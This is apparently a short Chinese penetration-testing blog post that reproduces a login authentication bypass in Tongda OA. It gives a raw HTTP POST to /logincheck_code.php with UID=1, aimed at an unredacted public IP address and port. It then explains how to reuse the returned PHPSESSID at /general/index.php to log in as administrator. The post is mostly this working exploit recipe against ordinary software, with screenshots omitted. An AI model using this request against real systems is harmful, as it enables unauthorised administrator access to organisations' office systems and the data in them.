Featured image of post 【渗透测试】通达OA登录认证绕过
渗透测试

【渗透测试】通达OA登录认证绕过

文章共106字

复现

开局一个登录框
image.png
抓包构造POC

1
2
3
4
5
6
7

POST /logincheck_code.php HTTP/1.1
Host: 61.184.199.14:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
UID=1

image.png
记录返回的PHPSESSID,在漏洞url后构建poc。
访问地址:

1

http://xxxx/general/index.php

image.png
image.png
替换刚才记录的PHPSESSID,成功登录到管理员用户。
image.png

© 2024 - 2025 Slimer
站点已运行计算中...